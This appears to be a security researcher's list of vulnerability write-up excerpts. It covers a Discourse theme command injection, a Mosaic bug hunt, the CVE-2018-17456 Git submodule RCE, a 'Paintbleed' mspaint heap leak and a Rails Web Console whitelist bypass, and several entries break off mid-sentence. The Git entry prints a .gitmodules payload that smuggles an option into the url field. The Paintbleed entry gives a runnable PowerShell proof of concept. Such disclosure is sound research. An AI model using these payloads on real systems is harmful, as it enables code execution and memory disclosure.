Discourse themes OS Command Injection

Discourse allows themes to be installed from remote Git repositories. Before this commit it was possible to inject OS commands via a maliciously crafted theme that is pulled via Git. The root cause of the issue lay in the parsing of the .discourse-compatibility file, a YAML file containing a mapping from a target Discourse version to the Git revision to be checked out for that specific Discourse version.

Mosaic “0day”

While attending WarCon in 2016, greg and I sat together in .mario’s talk “My Sweet Innocence Exposed - Eleven Reasons why we will all miss you, ‘e’”. His rants about MSIE reminded us of the fact that we both still had the task of finding a Mosaic 0day on our agenda. So the evening after the talk we sat down together and started approaching that goal. The latest version of Mosaic for Unix which can be found at ftp://ftp.

CVE-2018-17456

I’ve gotten a couple of questions about exploitation for the recent RCE in Git. So here we go with some technical details.

TL;DR: Here is a PoC repository.

Exploitation

The .gitmodules file looks as follows:

    [submodule "x:x"]
        path = x:x
        url = -u./payload

The actual command being injected is set by the url: -u./payload points the upload-pack flag of git clone to the payload shell script. Note also the : within the path; this part is needed to actually get the payload script executed.

Paintbleed

Summary

mspaint.exe does not properly verify DIB data from the clipboard. Therefore we can craft some DIB data in the clipboard which e.g. suggests a size of 0x100 by 0x100 pixels and contains not more than the DIB header itself. So the actual image data rendered by mspaint.exe is its own heap data =)

PoC

Run the following code in PowerShell:

    # System.Windows.Forms is not loaded in a fresh PowerShell session, so load it first
    Add-Type -AssemblyName System.Windows.Forms
    # 40-byte BITMAPINFOHEADER only: biSize=40, 256x256 pixels, 1 plane, 24 bpp,
    # biSizeImage=0x188; no pixel data follows the header
    [byte[]]$bytes = 40,0,0,0,0,1,0,0,0,1,0,0,1,0,24,0,0,0,0,0,136,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0
    [System.Windows.Forms.Clipboard]::SetData([System.Windows.Forms.DataFormats]::Dib,[System.IO.MemoryStream]::new($bytes))

Afterwards open mspaint.exe and paste. The result should be the graphical representation of some of mspaints.

WebConsole IP Whitelist bypass

With the release of Ruby on Rails 4.2 the so-called Web Console was introduced. As the Web Console documentation states: “Web Console is built explicitly for Rails 4.” By default the Web Console is available in the Rails development environment and allows only the IPs 127.0.0.1 and ::1 to access the console in order to evaluate arbitrary Ruby statements for the purpose of debugging. However, with Rails versions 4.1 and 4.